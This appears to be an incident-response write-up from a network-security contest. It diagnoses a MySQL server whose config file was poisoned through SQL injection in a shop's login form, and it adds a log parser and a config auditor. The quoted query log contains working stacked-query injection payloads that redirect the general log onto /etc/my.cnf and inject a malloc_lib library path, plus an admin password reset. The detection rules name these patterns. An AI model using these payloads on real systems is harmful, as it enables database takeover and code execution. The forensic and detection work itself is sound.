Closed bgpat closed 7 years ago
mysql is dead
● mysql.service loaded failed failed LSB: start and stop MySQL
bash-4.2# service --status-all
ERROR! MySQL is not running, but lock exists
netconsole module is not loaded.
Configured devices:
lo eth0
Currently active devices:
lo eth0
mysql won't start
bash-4.2# /etc/init.d/mysql start
Starting MySQL...... ERROR! Manager of pid-file quit without updating file.
/etc/mysql/my.cnf
[mysqld]
general_log=1
general_log_file=/tmp/query.log
/usr/sbin/mysqld, Version: 5.1.72-community-log (MySQL Community Server (GPL)). started with:
Tcp port: 3306 Unix socket: /var/lib/mysql/mysql.sock
Time Id Command Argument
170222 16:45:48 2 Query set global general_log = on
170222 16:45:55 2 Query select '
[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
[separator]
'
170222 16:46:00 2 Query set global general_log = off
Looks like my.cnf got rewritten through SQL injection or something?
There was a query log
bash-4.2# cat /tmp/query.log
170222 16:52:17 4 Connect root@localhost on
4 Init DB ictsc
4 Init DB ictsc
4 Query SHOW TABLE STATUS LIKE 'dtb_session'
4 Init DB ictsc
4 Query SELECT page_id ,page_name ,url ,php_dir ,tpl_dir ,filename ,header_chk ,footer_chk ,edit_flg ,author ,description ,keyword ,update_url ,create_date ,update_date FROM dtb_pagelayout WHERE url = 'index.php' ORDER BY page_id
4 Init DB ictsc
4 Query SELECT target_id ,(SELECT bloc_name FROM dtb_bloc AS bloc WHERE bloc.bloc_id = pos.bloc_id) AS bloc_name ,(SELECT tpl_path FROM dtb_bloc AS bloc WHERE bloc.bloc_id = pos.bloc_id) AS tpl_path ,(SELECT php_path FROM dtb_bloc AS bloc WHERE bloc.bloc_id = pos.bloc_id) AS php_path FROM dtb_blocposition AS pos WHERE page_id = (SELECT page_id FROM dtb_pagelayout WHERE url = 'index.php') ORDER BY target_id,bloc_row
4 Init DB ictsc
4 Query SELECT * FROM dtb_baseinfo
4 Init DB ictsc
4 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
4 Init DB ictsc
4 Query SELECT * FROM dtb_baseinfo
4 Init DB ictsc
4 Query SELECT * FROM dtb_category left join dtb_category_total_count using (category_id) WHERE del_flg = 0 AND product_count > 0 ORDER BY rank DESC
4 Init DB ictsc
4 Query SELECT parent_category_id,category_id FROM dtb_category
4 Init DB ictsc
4 Query SELECT *, cast(substring(news_date,1,10) as date) as news_date_disp FROM dtb_news WHERE del_flg = '0' ORDER BY rank DESC
4 Init DB ictsc
4 Query SELECT * FROM dtb_baseinfo
4 Init DB ictsc
4 Query SELECT A.*, name, price02_min, price01_min, main_list_image FROM dtb_best_products AS A INNER JOIN
(SELECT
product_id,
product_code_min,
product_code_max,
price01_min,
price01_max,
price02_min,
price02_max,
stock_min,
stock_max,
stock_unlimited_min,
stock_unlimited_max,
del_flg,
status,
name,
comment1,
comment2,
comment3,
rank,
main_list_comment,
main_image,
main_list_image,
product_flag,
deliv_date_id,
sale_limit,
point_rate,
sale_unlimited,
create_date,
deliv_fee
,(SELECT rank AS category_rank FROM dtb_category AS T4 WHERE T1.category_id = T4.category_id) as category_rank
,(SELECT category_id AS sub_category_id FROM dtb_category T4 WHERE T1.category_id = T4.category_id) as category_id
FROM
dtb_products AS T1 RIGHT JOIN (SELECT product_id AS product_id_sub, MIN(product_code) AS product_code_min, MAX(product_code) AS product_code_max, MIN(price01) AS price01_min, MAX(price01) AS price01_max, MIN(price02) AS price02_min, MAX(price02) AS price02_max, MIN(stock) AS stock_min, MAX(stock) AS stock_max, MIN(stock_unlimited) AS stock_unlimited_min, MAX(stock_unlimited) AS stock_unlimited_max FROM dtb_products_class GROUP BY product_id) AS T2 ON T1.product_id = T2.product_id_sub
) AS allcls using(product_id) WHERE status = 1 ORDER BY rank
4 Init DB ictsc
4 Query SELECT T1.category_id, category_name, level FROM dtb_category AS T1 LEFT JOIN dtb_category_total_count AS T2 ON T1.category_id = T2.category_id WHERE del_flg = 0 AND product_count > 0 ORDER BY rank DESC
4 Init DB ictsc
4 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
4 Init DB ictsc
4 Init DB ictsc
4 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
4 Init DB ictsc
4 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:10:\"/index.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
4 Quit
170222 16:52:18 5 Connect root@localhost on
5 Init DB ictsc
5 Init DB ictsc
5 Query SHOW TABLE STATUS LIKE 'dtb_session'
5 Init DB ictsc
5 Query SELECT * FROM dtb_baseinfo
5 Init DB ictsc
5 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
5 Init DB ictsc
5 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
5 Init DB ictsc
5 Init DB ictsc
5 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
5 Init DB ictsc
5 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:17:\"/mypage/login.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
5 Quit
170222 16:53:19 6 Connect root@localhost on
6 Init DB ictsc
6 Init DB ictsc
6 Query SHOW TABLE STATUS LIKE 'dtb_session'
6 Init DB ictsc
6 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query SELECT * FROM dtb_customer WHERE email LIKE BINARY ''; set global general_log_file = '/etc/my.cnf' --' AND del_flg = 0 AND status = 2
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_customer WHERE email = ''; set global general_log_file = '/etc/my.cnf' --' AND status = 1 AND del_flg = 0
6 Init DB ictsc
6 Query SELECT * FROM dtb_baseinfo
6 Init DB ictsc
6 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
6 Init DB ictsc
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:23:\"/mypage/login_check.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Quit
170222 16:53:20 6 Connect root@localhost on
6 Init DB ictsc
6 Init DB ictsc
6 Query SHOW TABLE STATUS LIKE 'dtb_session'
6 Init DB ictsc
6 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query SELECT * FROM dtb_customer WHERE email LIKE BINARY ''; set global general_log = on --' AND del_flg = 0 AND status = 2
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_customer WHERE email = ''; set global general_log = on --' AND status = 1 AND del_flg = 0
6 Init DB ictsc
6 Query SELECT * FROM dtb_baseinfo
6 Init DB ictsc
6 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
6 Init DB ictsc
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:23:\"/mypage/login_check.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Quit
170222 16:53:21 6 Connect root@localhost on
6 Init DB ictsc
6 Init DB ictsc
6 Query SHOW TABLE STATUS LIKE 'dtb_session'
6 Init DB ictsc
6 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query SELECT * FROM dtb_customer WHERE email LIKE BINARY ''; select '
[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
[separator]
' --' AND del_flg = 0 AND status = 2
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_customer WHERE email = ''; select '
[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
[separator]
' --' AND status = 1 AND del_flg = 0
6 Init DB ictsc
6 Query SELECT * FROM dtb_baseinfo
6 Init DB ictsc
6 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
6 Init DB ictsc
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:23:\"/mypage/login_check.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Quit
170222 16:53:22 6 Connect root@localhost on
6 Init DB ictsc
6 Init DB ictsc
6 Query SHOW TABLE STATUS LIKE 'dtb_session'
6 Init DB ictsc
6 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query SELECT * FROM dtb_customer WHERE email LIKE BINARY ''; set global general_log = off --' AND del_flg = 0 AND status = 2
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_customer WHERE email = ''; set global general_log = off --' AND status = 1 AND del_flg = 0
6 Init DB ictsc
6 Query SELECT * FROM dtb_baseinfo
6 Init DB ictsc
6 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
6 Init DB ictsc
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:23:\"/mypage/login_check.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Quit
170222 16:53:23 6 Connect root@localhost on
6 Init DB ictsc
6 Init DB ictsc
6 Query SHOW TABLE STATUS LIKE 'dtb_session'
6 Init DB ictsc
6 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query SELECT * FROM dtb_customer WHERE email LIKE BINARY ''; update `ictsc`.`dtb_member` SET `password` = '1234' WHERE `dtb_member`.`member_id` = 2 --' AND del_flg = 0 AND status = 2
6 Init DB ictsc
6 Query SELECT * COUNT(*) FROM dtb_customer WHERE email ''; update `ictsc`.`dtb_member` SET `password` = '1234' --' WHERE `dtb_member`.`member_id` = 2 --' AND del_flg = 0 AND status = 2
6 Init DB ictsc
6 Query SELECT * FROM dtb_baseinfo
6 Init DB ictsc
6 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
6 Init DB ictsc
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:23:\"/mypage/login_check.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
153.23.98.1 - - [27/Feb/2017:05:12:38 +0900] "POST /mypage/login_check.php HTTP/1.1" 200 8202 "http://10.1.19.3/mypage/login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
root pts/2 172.31.0.44 Wed Feb 22 16:45 - 16:49 (00:03)
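The query log above is the whole story of the compromise: the login form's `email` parameter is closed with `''; ... --'`, the web app is connected as `root@localhost`, so `SET GLOBAL general_log_file = '/etc/my.cnf'` succeeds, and the next `SELECT '...'` of a string literal containing `malloc_lib=/tmp/mysql_exploit_lib.so` is appended verbatim to the config file (the technique publicly described as CVE-2016-6662). The following is an added example, not code from the issue: a small parser for the MySQL 5.1 general-log format (timestamped header line, connection id, command, argument, with multi-line arguments continued on following lines) plus detection rules run over a constructed excerpt of the log above. Rule names and the `SAMPLE_LOG` excerpt are this example's own.

```python
"""Scan a MySQL 5.1-style general query log for the stacked-query login-form
injection seen above and for statements that retarget the log file.
Added example for this write-up; not code from the issue."""
import re
from dataclasses import dataclass

# One log event: optional "YYMMDD HH:MM:SS", connection id, command, argument.
# The real file separates fields with tabs; the copy above has spaces, so \s+.
_EVENT_RE = re.compile(
    r"^\s*(?:(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2})\s+)?"
    r"(?P<conn>\d+)\s+"
    r"(?P<cmd>Connect|Init DB|Query|Quit|Field List|Prepare|Execute|Close stmt|Statistics)"
    r"(?:\s+(?P<arg>.*))?$"
)


@dataclass
class Event:
    ts: str    # last timestamp printed at or before this line
    conn: str  # connection id
    cmd: str
    arg: str


@dataclass
class Finding:
    ts: str
    conn: str
    rule: str
    excerpt: str


def parse_general_log(text: str) -> list[Event]:
    events: list[Event] = []
    last_ts = ""
    for line in text.splitlines():
        m = _EVENT_RE.match(line)
        if m:
            last_ts = m.group("ts") or last_ts
            events.append(Event(last_ts, m.group("conn"), m.group("cmd"), m.group("arg") or ""))
        elif events:
            # Continuation of a multi-line argument (the injected my.cnf fragment
            # above spans several lines). Caveat: a continuation line that itself
            # looks like "<id> Query ..." would be mis-split into a new event.
            events[-1].arg += "\n" + line
        # Banner lines before the first event ("Tcp port: ...") are skipped.
    return events


# Query-text rules; the names are this example's own.
_QUERY_RULES = [
    # closing quote, ';', then a new statement: the  ''; <stmt> --'  payload
    ("stacked-statement",
     re.compile(r"'\s*;\s*(?:set|select|update|insert|delete|drop|create|alter|grant|load)\b", re.I)),
    ("general-log-retarget",
     re.compile(r"\bset\s+global\s+general_log(?:_file)?\b", re.I)),
    ("malloc_lib-in-query",
     re.compile(r"\bmalloc_lib\s*=", re.I)),
    ("file-write-primitive",
     re.compile(r"\binto\s+(?:out|dump)file\b|\bload_file\s*\(", re.I)),
]
_LOGFILE_RE = re.compile(r"\bgeneral_log_file\s*=\s*'([^']*)'", re.I)


def scan_events(events: list[Event]) -> list[Finding]:
    findings: list[Finding] = []
    for ev in events:
        if ev.cmd == "Connect" and ev.arg.startswith("root@"):
            # The web app authenticating as root is what made SET GLOBAL possible.
            findings.append(Finding(ev.ts, ev.conn, "app-connects-as-root", ev.arg))
        elif ev.cmd == "Query":
            flat = " ".join(ev.arg.split())  # collapse the multi-line literal
            for rule, rx in _QUERY_RULES:
                m = rx.search(flat)
                if m:
                    findings.append(Finding(ev.ts, ev.conn, rule,
                                            flat[max(0, m.start() - 20):m.end() + 40]))
    return findings


def log_file_targets(events: list[Event]) -> list[str]:
    """Paths the general log was pointed at; every later statement on any
    connection gets appended to these files until it is pointed elsewhere."""
    return [m.group(1) for ev in events if ev.cmd == "Query"
            for m in _LOGFILE_RE.finditer(ev.arg)]


# Constructed sample, abbreviated from the log above.
SAMPLE_LOG = """\
170222 16:53:19 6 Connect root@localhost on
6 Init DB ictsc
6 Query SELECT * FROM dtb_customer WHERE email LIKE BINARY ''; set global general_log_file = '/etc/my.cnf' --' AND del_flg = 0 AND status = 2
6 Query SELECT * FROM dtb_baseinfo
6 Quit
170222 16:53:21 6 Connect root@localhost on
6 Query SELECT * FROM dtb_customer WHERE email LIKE BINARY ''; select '
[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
[separator]
' --' AND del_flg = 0 AND status = 2
6 Quit
"""

if __name__ == "__main__":
    evs = parse_general_log(SAMPLE_LOG)
    for f in scan_events(evs):
        print(f"{f.ts} conn={f.conn} {f.rule}: {f.excerpt}")
    print("general log retargeted to:", log_file_targets(evs))
```

Run it against the full `/tmp/query.log` and the `general-log-retarget` and `malloc_lib-in-query` hits give the exact timestamps and connection ids to correlate with the httpd access log and `last` output; `log_file_targets` lists every file that now needs to be treated as attacker-controlled.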
Accessing the server in question and trying to restart mysql produced the following error.
● mysql.service loaded failed failed LSB: start and stop MySQL
bash-4.2# /etc/init.d/mysql start
Starting MySQL...... ERROR! Manager of pid-file quit without updating file.
Opening the mysql configuration file /etc/mysql/my.cnf showed that the configuration file had been rewritten.
[mysqld]
general_log=1
general_log_file=/tmp/query.log
/usr/sbin/mysqld, Version: 5.1.72-community-log (MySQL Community Server (GPL)). started with:
Tcp port: 3306 Unix socket: /var/lib/mysql/mysql.sock
Time Id Command Argument
170222 16:45:48 2 Query set global general_log = on
170222 16:45:55 2 Query select '
[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
[separator]
'
170222 16:46:00 2 Query set global general_log = off
After commenting out the lines from general_log_file onward, mysql could be started, and the EC site could be displayed again.
From the query log and the httpd log, SQL injection had been carried out via the EC site's login form. With set global general_log_file = '/etc/my.cnf', the SQL log was being written to my.cnf. Because mysql is started as root,
The attack source IP addresses were 153.129.14.1 and 153.23.98.1.
Accessing the server in question and trying to restart mysql produced the following error.
● mysql.service loaded failed failed LSB: start and stop MySQL
bash-4.2# /etc/init.d/mysql start
Starting MySQL...... ERROR! Manager of pid-file quit without updating file.
Opening the mysql configuration file /etc/mysql/my.cnf showed that the configuration file had been rewritten.
[mysqld]
general_log=1
general_log_file=/tmp/query.log
/usr/sbin/mysqld, Version: 5.1.72-community-log (MySQL Community Server (GPL)). started with:
Tcp port: 3306 Unix socket: /var/lib/mysql/mysql.sock
Time Id Command Argument
170222 16:45:48 2 Query set global general_log = on
170222 16:45:55 2 Query select '
[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
[separator]
'
170222 16:46:00 2 Query set global general_log = off
After commenting out the lines from general_log_file onward, mysql could be started, and the EC site could be displayed again.
From the query log and the httpd log, SQL injection had been carried out via the EC site's login form.
set global general_log_file = /etc/my.cnf
When checking with the last command, a user had logged in as root at the same time, so this is believed to be the attacker.
root pts/2 172.31.0.44 Wed Feb 22 16:45 - 16:49 (00:03)
The attack source IP address was 172.31.0.44.
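The fix applied above was to comment out everything from `general_log_file` onward by hand. Before restarting `mysqld` after an incident like this, it is worth checking the config file mechanically, because `mysqld_safe` honours `malloc_lib` from the `[mysqld]` group as well as `[mysqld_safe]` and will `LD_PRELOAD` the named library into the next `mysqld` it starts. The following is an added example, not the issue's own code: a my.cnf audit that flags a `malloc_lib` outside the system library directories, a `general_log_file` outside the expected log directories (this variable is not constrained by `secure_file_priv`), `user=root`, and any line that is not a valid option line, which is exactly what log banner and query lines left in the file look like. The `TRUSTED_*` tuples, the rule names, and both sample configs are this example's assumptions; `POISONED_CNF` is a constructed copy of the rewritten file shown above.

```python
"""Audit a my.cnf for the poisoning pattern in this incident: the general log
retargeted onto the config file, a malloc_lib line injected, and log banner
and query lines left behind. Added example; not code from the issue."""
import re
from dataclasses import dataclass

_SECTION_RE = re.compile(r"^\[([^\]]+)\]$")
_INCLUDE_RE = re.compile(r"^!include(?:dir)?\s+\S+$")
# Option lines are  name  or  name = value ; MySQL accepts - or _ in names.
_OPTION_RE = re.compile(r"^([A-Za-z_][\w-]*)\s*(?:=\s*(.*))?$")

# Assumed policy for this example; adjust to the host's packaging.
TRUSTED_LIB_DIRS = ("/usr/lib/", "/usr/lib64/", "/lib/", "/lib64/")
TRUSTED_LOG_DIRS = ("/var/lib/mysql/", "/var/log/mysql/")


@dataclass
class Finding:
    line_no: int
    rule: str
    text: str


def audit_my_cnf(text: str) -> list[Finding]:
    findings: list[Finding] = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if _SECTION_RE.match(line) or _INCLUDE_RE.match(line):
            continue
        m = _OPTION_RE.match(line)
        if not m:
            # Anything that is not an option line is foreign: the mysqld banner,
            # "Time Id Command Argument", timestamped query lines, a lone quote.
            findings.append(Finding(n, "non-config-line", line))
            continue
        key = m.group(1).lower().replace("-", "_")
        value = (m.group(2) or "").strip().strip("'\"")
        if key == "malloc_lib":
            # mysqld_safe honours this from [mysqld] as well as [mysqld_safe]
            # and LD_PRELOADs the library into mysqld at the next start.
            # "tcmalloc" is the one keyword value mysqld_safe resolves itself.
            if value not in ("", "tcmalloc") and not value.startswith(TRUSTED_LIB_DIRS):
                findings.append(Finding(n, "malloc_lib-untrusted-path", line))
        elif key == "general_log_file" and not value.startswith(TRUSTED_LOG_DIRS):
            # secure_file_priv does not constrain this path; SET GLOBAL can point
            # it at any file mysqld can write, /etc/my.cnf included.
            findings.append(Finding(n, "general_log_file-outside-log-dir", line))
        elif key == "user" and value == "root":
            findings.append(Finding(n, "mysqld-runs-as-root", line))
    return findings


# Constructed copy of the rewritten my.cnf shown in the issue.
POISONED_CNF = """\
[mysqld]
general_log=1
general_log_file=/tmp/query.log
/usr/sbin/mysqld, Version: 5.1.72-community-log (MySQL Community Server (GPL)). started with:
Tcp port: 3306 Unix socket: /var/lib/mysql/mysql.sock
Time Id Command Argument
170222 16:45:48 2 Query set global general_log = on
170222 16:45:55 2 Query select '
[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
[separator]
'
170222 16:46:00 2 Query set global general_log = off
"""

# Constructed clean config for comparison.
CLEAN_CNF = """\
[mysqld]
user=mysql
datadir=/var/lib/mysql
general_log=0
general_log_file=/var/lib/mysql/query.log

[mysqld_safe]
log-error=/var/log/mysqld.log
"""

if __name__ == "__main__":
    for label, cnf in (("poisoned", POISONED_CNF), ("clean", CLEAN_CNF)):
        print(label)
        for f in audit_my_cnf(cnf):
            print(f"  line {f.line_no}: {f.rule}: {f.text[:60]}")
```

Run it over `/etc/my.cnf`, `/etc/mysql/my.cnf` and every file under an `!includedir` directory, since `mysqld` reads all of them. The file check is only half of it: `SET GLOBAL` is not persisted, so the live `SHOW GLOBAL VARIABLES LIKE 'general_log%'` output on a still-running server, and the library file the `malloc_lib` line points at, need the same scrutiny.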
http://contest.ictsc/#/problems/10/8/issues